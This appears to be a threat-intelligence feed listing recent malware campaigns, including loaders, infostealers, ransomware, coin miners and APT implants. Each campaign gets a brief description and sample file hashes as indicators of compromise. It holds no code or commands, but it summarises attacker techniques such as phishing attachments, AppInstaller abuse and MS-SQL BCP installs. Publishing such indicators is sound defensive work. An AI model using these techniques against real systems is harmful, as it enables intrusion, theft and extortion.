MD5: c60ac6a6e6e582ab0ecb1fdbd607705b
SHA1: ba9de479beb82fd97bbdfbc04ef22e08224724ba
SHA256: 4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87
2b282_browsing70c1675990a2c78b31faab547fb75948dd1c2b22e892377ee5e40abebc2XxX92Exe·exe
MD5: 2cda932f5a9dafb0a328d0f9788bd89c
SHA1: e27521c7158c6af3aa58f78fcbed64b17c946f70
SHA256: 2b28270c1675990a2c78b31faab547fb75948dd1c2b22e892377ee5e40abebc2
6cadab96185dbe6f3a_browsing7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360XxX93Exe·exe
MD5: 0885b3153e61caa56117770247be0444
SHA1: 941d001e2974c9762249b93496b96250211f6e0f
SHA256: 6cadab96185dbe6f3a7b95cf2f97d6ac395785607baa6ed7bf363deeb59cc360
JinxLoader Leads To FormbookXLoader
JinxLoader is a relatively new malware service first posted to hackforums.
The malware first arrives through a phishing email as an archived attachment and leads to Formbook/XLoader C2 traffic.
Sample IoCs
9b1090ff32a441a89294_browsing739884b9a0330e75497573dde39b6b79ac4dd0a9effdXxX36Zip·zip
MD5: b64c7b16323fca44ab64b592368a6f2d
SHA1: 3ec99de18abd9dfb5081840afb04280437a3d50d
SHA256: 9b1090ff32a441a89294739884b9a0330e75497573dde39b6b79ac4dd0a9effd
b_browsing7c66440c975bed86efe68c47c95bd1460ab8cf21bccacfc1e80c145e7be0f8bXxX37Exe·exe
MD5: 46ce034ff575452d1d26c2002788f403
SHA1: 17219562838ee0d7fdf7a4883ed130757db556bb
SHA256: b7c66440c975bed86efe68c47c95bd1460ab8cf21bccacfc1e80c145e7be0f8b
c1d3ad3f518cf02925d304f1912860d01e8cfd8d2ed6f_browsing76bd200c7d25370206fXxX38Dll·dll
MD5: 23f06ef88b78cb6b011ebd36af6b4e72
SHA1: a1c2ba291bffcd95e26fc2acae1cfbf0905ddc6f
SHA256: c1d3ad3f518cf02925d304f1912860d01e8cfd8d2ed6f76bd200c7d25370206f
Fog Of Cyber Warfare Cloud Atlas Spies Attack Russian Companies Under The Guise Of Supporting NWO Participants
Cloud Atlas is a pro-government APT group Specializing on cyber espionage and theft of confidential information. According to the researchers Active at least since 2014. More often than others Cloud Atlas targets were industrial enterprises and state-owned companies in Russia Belarus Azerbaijan Turkey and Slovenia. The main attack vector is a targeted email campaign with a malicious attachment.
Sample IoCs
cfc31_browsing78b710038666a4a4c5676b5c6befea085ad0243663791ae95f65e1468deXxX1Doc·doc
MD5: 0957edfec31dd2dd05d484eed90593c7
SHA1: a03a699031e956b4fde1ced6309b67853a54602a
SHA256: cfc3178b710038666a4a4c5676b5c6befea085ad0243663791ae95f65e1468de
baccfa04bf_browsing7cf862c05bc7180532cf609df43a091febd3d85524d6689df6e405XxX4Doc·doc
MD5: 2e950fe4bd76088f89433a6f2146cb67
SHA1: 07735f3da5f5847e9df43034459e3ead4c1f3f35
SHA256: baccfa04bf7cf862c05bc7180532cf609df43a091febd3d85524d6689df6e405
e3d2e6f8_browsing740bc5a510239af41e77a3e07eaf09f1aa5cda78558035399db3f971XxX5Doc·doc
MD5: 7bdb049cb0cc3623e4fa1d8e2574f1ce
SHA1: 7329424eba132feebba57e239000331e886b1656
SHA256: e3d2e6f8740bc5a510239af41e77a3e07eaf09f1aa5cda78558035399db3f971
Three New Malicious PyPI Packages Deploy CoinMiner On Linux Devices
FortiGuard has identified three new malicious PyPI packages that deploy a CoinMiner executable on Linux devices in an analysis published in the Security Research Review (PSIRT) journal on Wednesday.
Sample IoCs
df0211bf541_browsing74b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2acaXxX1Elf·elf
MD5: 91420762292cddfcf9e2ad552de41518
SHA1: 5ef904a0cc9bdcd49f57ac95f1d17686a78d6299
SHA256: df0211bf54174b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2aca
df0211bf541_edr74b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2acaXxX1Elf·elf
MD5: 91420762292cddfcf9e2ad552de41518
SHA1: 5ef904a0cc9bdcd49f57ac95f1d17686a78d6299
SHA256: df0211bf54174b5766366eecfb0a04c4a59346478e1507b6685fbaed6b2d2aca
MetaStealer Latest Version Analysis
MetaStealer is an infostealer launched in 2022 that includes the functionality code and panel of Redline Stealer. In the previous months several updates have taken place including new functionality like the Google cookies refresher which allows it to generate new session cookies when they have expired or new obfuscation mechanisms. Apart from that it contains the same capabilities of previous versions such as the theft of system files and credentials screen capture and the collection of cryptocurrency information.
Sample IoCs
008f9352_browsing765d1b3360726363e3e179b527a566bc59acecea06bd16eb16b66c5dXxX194Exe·exe
MD5: e6db93b513085fe253753cff76054a2a
SHA1: 33091b6f54dfcd85e0c7a7490a468c5b32174db3
SHA256: 008f9352765d1b3360726363e3e179b527a566bc59acecea06bd16eb16b66c5d
cf0becb19e10b2dcd9_browsing72fbe94aea00c51b8290b052263117e7ed8721d48ee104XxX196Exe·exe
MD5: a8d6e729b4911e1a0e3e9053eab2392b
SHA1: c1730126a7673bafe780d92fcca9d88707df0ff3
SHA256: cf0becb19e10b2dcd972fbe94aea00c51b8290b052263117e7ed8721d48ee104
0308d3c_browsing70f995bb4fd979802c0a6fd91e40d4baf21858d50f1a25a0b8a0653e6XxX198Exe·exe
MD5: b3cca536bf466f360b7d38bb3c9fc9bc
SHA1: c0fa6e6a1cf0c49db74259c821e9d33a73743656
SHA256: 0308d3c70f995bb4fd979802c0a6fd91e40d4baf21858d50f1a25a0b8a0653e6
Unveiling The Mirai Insights Into Recent DShield Honeypot Activity
The method in which Mirai infiltrated numerous IoT devices was through common vulnerabilities such as weak and default username and password combinations. Once Mirai gains access to a system it carries out its primary function to enslave devices and coordinate them for massive Distributed Denial of Service (DDoS) attacks.
Sample IoCs
5466d9405031060ffb564f14b5a263eda12e1_browsing79287ca4a4a7c94501cd6a25c53XxX165Elf·elf
MD5: 91c36bd124e4c8f7a2bc6b6d01324d3c
SHA1: c7ae2abe4870bb274c1420beab092edb276dde78
SHA256: 5466d9405031060ffb564f14b5a263eda12e179287ca4a4a7c94501cd6a25c53
b023af46_browsing798a045ce9606318928ed9a96bd64bc25c7279a08b5fee38176e5dc9XxX166Elf·elf
MD5: d4dfa01b9aec82a3383a522a6e74b2a5
SHA1: fb9900355f4671f79ed9a2575f2178aa9fcc77a7
SHA256: b023af46798a045ce9606318928ed9a96bd64bc25c7279a08b5fee38176e5dc9
5466d9405031060ffb564f14b5a263eda12e1_edr79287ca4a4a7c94501cd6a25c53XxX165Elf·elf
MD5: 91c36bd124e4c8f7a2bc6b6d01324d3c
SHA1: c7ae2abe4870bb274c1420beab092edb276dde78
SHA256: 5466d9405031060ffb564f14b5a263eda12e179287ca4a4a7c94501cd6a25c53
Technical Analysis Of Pure Logs Stealer
Pure Logs is an info-stealer developed by a malware developer going by the alias PureCoder and emerged in various forums for sale around October 2022. This stealer is encrypted with Pure Crypter and consists of multiple features, including Anti-VM File deletion, File grabber clipboard data stealing lucrative information from crypto applications, email applications web browsers.
Threat actor achieves persistence via registry run keys and, after achieving action on objectives, removes the payload using PowerShell.
Sample IoCs
8543ea15813ea1_browsing70dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4XxX1Dll·dll
MD5: e137cdeda4f4b5fd1b1138f4c1982d83
SHA1: e2bce8d85343f800ca3bb92f691110fd97820169
SHA256: 8543ea15813ea170dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4
2b84f504b2b8389d28f2a81_browsing79a8369fc511391e7331f852aaf3a6a2f26a79ee4XxX3Dll·dll
MD5: 84c5bbe6bc76c4ac3ce3c6bd0b67741c
SHA1: 4b4c7e5bf868f98dd717e085fd14bb9c81648288
SHA256: 2b84f504b2b8389d28f2a8179a8369fc511391e7331f852aaf3a6a2f26a79ee4
8543ea15813ea1_edr70dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4XxX1Dll·dll
MD5: e137cdeda4f4b5fd1b1138f4c1982d83
SHA1: e2bce8d85343f800ca3bb92f691110fd97820169
SHA256: 8543ea15813ea170dd0538d7cd629f451ceb7e18b07c4db1cdbce5e089b227d4
Threat Actors Exploit MS-AppInstaller On Potential Victim Systems To Deploy Malware And For Monetary Gain
Financially motivated threat actors like Dev-0569 Fin7 Storm-1133 Storm-1674 utilize the MS-Appinstaller URL scheme to deploy malicious payloads against potential victims. They exploit the MS-Appinstaller protocol handler to distribute MSIX application packages through spoofed websites and phishing attacks. Attackers leverage SEO tactics to take advantage of victims searching for legitimate software by tricking them into downloading malicious installers.
Sample IoCs
48aa2393ef590bab4ff2fd1e_browsing7d95af36e5b6911348d7674347626c9aaafa255eXxX196Exe·exe
MD5: dd131870c45342afdd00f314730481ca
SHA1: e915271b74704df25dca82a291330b14d36d4788
SHA256: 48aa2393ef590bab4ff2fd1e7d95af36e5b6911348d7674347626c9aaafa255e
b_browsing79633917e51da2a4401473d08719f493d61fd64a1b10fe482c12d984d791ccbXxX198Bat·bat
MD5: 26bd728f2394d59929f2c655c2c859be
SHA1: 79962b6ab8a597a7d20f7ec38916a13c2b6ebb36
SHA256: b79633917e51da2a4401473d08719f493d61fd64a1b10fe482c12d984d791ccb
44cac5bf0bab56b0840bd1c_browsing7b95f9c7f5078ff417705eeaaf5ea5a2167a81dd5XxX204Zip·zip
MD5: 7d27ed94ba01dc9c2761af0ed84c616f
SHA1: c2d9ecb9e0496dd21e636a77fac370325b8ae6ef
SHA256: 44cac5bf0bab56b0840bd1c7b95f9c7f5078ff417705eeaaf5ea5a2167a81dd5
A Look At The Nim-Based Campaign Using Microsoft Word Docs To Impersonate The Nepali Government – Netskope
Netskope recently analyzed a malicious backdoor written in Nim which is a relatively new programming language. Netskope Threat labs has observed an increase in Nim-based malware over the past year and expects Nim-based malware to become more popular as attackers continue to modify existing Nim-based samples.
Sample IoCs
b5c001cbcd_browsing72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6eXxX1Docx·docx
MD5: e2a3edc708016316477228de885f0c39
SHA1: 3aa803baf5027c57ec65eb9b47daad595ba80bac
SHA256: b5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e
b5c001cbcd_edr72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6eXxX1Docx·docx
MD5: e2a3edc708016316477228de885f0c39
SHA1: 3aa803baf5027c57ec65eb9b47daad595ba80bac
SHA256: b5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e
b5c001cbcd_mail72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6eXxX1Docx·docx
MD5: e2a3edc708016316477228de885f0c39
SHA1: 3aa803baf5027c57ec65eb9b47daad595ba80bac
SHA256: b5c001cbcd72b919e9b05e3281cc4e4914fee0748b3d81954772975630233a6e
Blackwood APT Delivers NSPX30 Implant
Researchers have analyzed a cyber attack conducted by a previously undisclosed China-aligned threat actor known as Blackwood active since at least 2018· The attack involves a sophisticated implant NSPX30 delivered through adversary-in-the-middle (AitM) attacks that hijack update requests from legitimate software like Tencent QQ WPS Office and Sogou Pinyin. NSPX30 is employed in targeted attacks against Chinese and Japanese companies as well as individuals in China Japan and the United Kingdom. The evolution of NSPX30 is traced back to a 2005 backdoor called Project Wood designed for data collection. NSPX30 is a multistage implant with components including a dropper installer loaders orchestrator and a backdoor each with its own set of plugins. The implant facilitates packet interception allowing operators to conceal their infrastructure and it can whitelist itself in various Chinese antimalware solutions.
Sample IoCs
aea2_browsing77eb7cd8383479d1e502d9e3eb76f8d17c4be2dcaa63fda444cac6e96197XxX69Dll·dll
MD5: 5e45d7a7324384eb42e65586d494f7bf
SHA1: 308616371b9ff5830dffc740318fd6ba4260d032
SHA256: aea277eb7cd8383479d1e502d9e3eb76f8d17c4be2dcaa63fda444cac6e96197
fa8e6f0094e9adcad61b80c_browsing75726bf6c7624c2b10a531f9c0f8a6ffb49b950baXxX71Dll·dll
MD5: f8084ed1dc34852c32d06856784dce4d
SHA1: 240055aa125bd31bf5ba23d6c30133c5121147a5
SHA256: fa8e6f0094e9adcad61b80c75726bf6c7624c2b10a531f9c0f8a6ffb49b950ba
72b81424d6235f1_browsing7b3fc393958481e0316c63ca7ab9907914b5a737ba1ad2374XxX73Dll·dll
MD5: d8c80dc68e24a6b3c2ac31e1ef489612
SHA1: 43622b9573413e17985b3a95cbe18cfe01fadf42
SHA256: 72b81424d6235f17b3fc393958481e0316c63ca7ab9907914b5a737ba1ad2374
Trigona Ransomware Attackers Install Mimic Ransomware
In a recent discovery a concerning trend has come to light involving Trigona ransomware attackers incorporating Mimic ransomware into their repertoire. This new wave of attacks is explicitly honing in on MS-SQL servers leveraging the Bulk Copy Program (BCP) utility for the malware installation process. The investigation brought to light an attack in early January 2024 where Mimic ransomware was initially deployed but was later replaced by Trigona ransomware in mid-January 2024. Notably the attackers email address in the Mimic ransom note differed from previous instances while the Trigona ransomware note shared an email address consistently used since early 2023. What ties these incidents together is the belief that they stem from the same Trigona attacker. The commonalities include a focus on MS-SQL servers using BCP for malware installation and replicating identical strings and path names across various attacks.
Sample IoCs
a15d1311e02cffd6_browsing7a0db25cb0d6b2ccd3fc457d0bd76d7d2a4a462bbad6356aXxX45Exe·exe
MD5: a02157550bc9b491fd03cad394ccdfe7
SHA1: 108b7428e779d5caa7854a1a4dfa5ca42f292f04
SHA256: a15d1311e02cffd67a0db25cb0d6b2ccd3fc457d0bd76d7d2a4a462bbad6356a
9ab353d50d8fb366cb898ffaba2a_browsing71b1ae772475d1ad550232d6416b15fd3b54XxX47Exe·exe MD5: b3c8d81d6f8d19e5c07e1ca7932ed5bf
SHA1: f411ffa316df84de0e9e01c56bd4ebe3f6b2c1c9
SHA256: 9ab353d50d8fb366cb898ffaba2a71b1ae772475d1ad550232d6416b15fd3b54
85f4088286ac1eedc94ad9dc6465e9e4b89d1cde3012f9949450fcc9f2b60431_browsingXxX49Exe·exe
MD5: c28b33f7365f9dc72cc291d13458f334
SHA1: b4ad79b2800a6540f1c460ce6220a4ebb551a18b
SHA256: 85f4088286ac1eedc94ad9dc6465e9e4b89d1cde3012f9949450fcc9f2b60431
Albabat Ransomware Analysis
Albabat, also known as White Bat, is a financially motivated ransomware variant coded in Rust initially emerging in November 2023 with version 0.1.0. Subsequent releases include version 0.3.0 in late December and version 0.3.3 in mid-January 2024. The ransomware is distributed disguised as rogue software such as a fake Windows 10 digital activation tool or a Counter-Strike 2 cheat program. Albabat primarily targets companies and individuals in various countries including Argentina Brazil the Czech Republic Germany Hungary Kazakhstan Russia and the United States. Despite regional focus its distribution as fake software poses a threat to users globally.
Sample IoCs
e1c399c29b93_browsing79f9d1d3f17822d4496fce8a5123f57b33f00150f287740049e9XxX1Exe·exe
MD5: 4c7d2ec42f5b225982d9e2e96383a2fd
SHA1: 6edc8db346032a83402d7104c5783cc1e929e402
SHA256: e1c399c29b9379f9d1d3f17822d4496fce8a5123f57b33f00150f287740049e9
483e0e32d3be3d2e585463aa_browsing7475c8b8ce254900bacfb9a546a5318fff024b74XxX3Exe·exe
MD5: 45d20637261dea248644a849818659a0
SHA1: 29a81b7cf0f5f4a69fe47c4ccf3d06a300899997
SHA256: 483e0e32d3be3d2e585463aa7475c8b8ce254900bacfb9a546a5318fff024b74
bfb824_browsing7e97f5fd8f9d3ee33832fe29f934a09f91266f01a5fed27a3cc96f8fbbXxX5Exe·exe
MD5: 9463a6a5b1d4f07c66a17918eb5c386e
SHA1: 7181cc5c31e98d5c3f8fa83a44b475f25c511a0f
SHA256: bfb8247e97f5fd8f9d3ee33832fe29f934a09f91266f01a5fed27a3cc96f8fbb
Spreading Zephyr Coin Miner Using AutoIT
A recent report confirms the distribution of Zephyr coin miners. The malicious file created with AutoIT is distributed as a compressed file named “WINDOWS_PY_M3U_EXPLOIT_2024.7z.” Unzipping it generates scripts and executable files including a NSIS installation file and two JavaScript files. Upon execution JavaScript files are created in the %temp% path and executed through wscript.exe.
Sample IoCs
fa4ab8fa46a5f1d9fc2aa5fa5_browsing75f2a2938aed131237ebf5a5e35df154681ee38XxX5Exe·exe
MD5: 1ea56f7d135c6d9394138b91b3b7bed2
SHA1: f6d679c8820ee658069e08dab03af68ff345af54
SHA256: fa4ab8fa46a5f1d9fc2aa5fa575f2a2938aed131237ebf5a5e35df154681ee38
15fe980582_browsing7a262de3738dad2c1f8e2dbcdf43e13e42e558e63e3a1c169cbef1XxX7Exe·exe
MD5: 2b7931a70748c38c8046dea9dc708379
SHA1: 0d7f4a14708bb6ae1e47ddeabfdc4e29c090eed9
SHA256: 15fe9805827a262de3738dad2c1f8e2dbcdf43e13e42e558e63e3a1c169cbef1
3622e1492_browsing7a90af7007ae998f647f11813f0dfb49eda36f5e8a9cab14c5961b4XxX9Exe·exe
MD5: 6647cd9d0ab63506c230fbce8019d0b8
SHA1: 04018ce1f4e0fb4c01eda19f1b28d6e96925665e
SHA256: 3622e14927a90af7007ae998f647f11813f0dfb49eda36f5e8a9cab14c5961b4
Another Phobos Ransomware Variant Launches Attack
A new variant of the Phobos ransomware has been launched by attackers using the Gitea service to store files encoded in Base64 according to FortiGuard Labs.
Sample IoCs
426284b_browsing7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33XxX1Docx·docx
MD5: fe4409bf10488b02442cadeb85e000d2
SHA1: 17125f4ece6483933eb6646a16cd2859389a938a
SHA256: 426284b7dedb929129687303f1bf7e4def607f404c93f7736d17241e43f0ab33
50e2cb6004_browsing71fc38c4245d596f92f5444e7e17cd21dd794ba7d547e0f2d9a9d5XxX2Dll·dll
MD5: e8bfe9cf6c74389dbd26f496ef9a0134
SHA1: 76da039790593beeff067ef4f1da9eab9331bf4e
SHA256: 50e2cb600471fc38c4245d596f92f5444e7e17cd21dd794ba7d547e0f2d9a9d5
a0a59d83fa8631d0b9de2f4_browsing77350faa89499e96fd5ec07069e30992aaabe913aXxX3Exe·exe
MD5: 783017c5bcd0afc6e72d4b04763f584b
SHA1: 4cee55b7106c92972f534ad96b393f92c73f491e
SHA256: a0a59d83fa8631d0b9de2f477350faa89499e96fd5ec07069e30992aaabe913a
The Endless Struggle Against APT10 Insights From LODEINFO
The latest version of the LODEINFO malware has been discovered in 2023 and it is believed to have been updated with new features as well as changes to the anti-analysis techniques.
Sample IoCs
7a4fd1cc932b961_browsing75055b2940242877cab728a9d7c7ee371cad8438b4e88a812XxX16Dll·dll
MD5: 2a9012499d15145b5f63700c05adc426
SHA1: 0a49317ef08ef453b3778bf550b378c96204bab4
SHA256: 7a4fd1cc932b96175055b2940242877cab728a9d7c7ee371cad8438b4e88a812
6329_browsing75a3642b0f2a6084880e59ffa19dfa8b08d13ac15b639e1e0ad3bdbf45bdXxX19Exe·exe
MD5: 60dea5b5f889f37f5a9196e040bce0eb
SHA1: e467aa61e70905b389be528441ce42de1db4cf2c
SHA256: 632975a3642b0f2a6084880e59ffa19dfa8b08d13ac15b639e1e0ad3bdbf45bd
526f48c6b3b_browsing767c119282e362eeb39238ac3593f7b3742eb08e67cd93d913a44XxX20Doc·doc
MD5: 69dd7fd355d79db0325816569ae2129a
SHA1: c08bf05db87896a15ac1913ac96bd47a35220225
SHA256: 526f48c6b3b767c119282e362eeb39238ac3593f7b3742eb08e67cd93d913a44
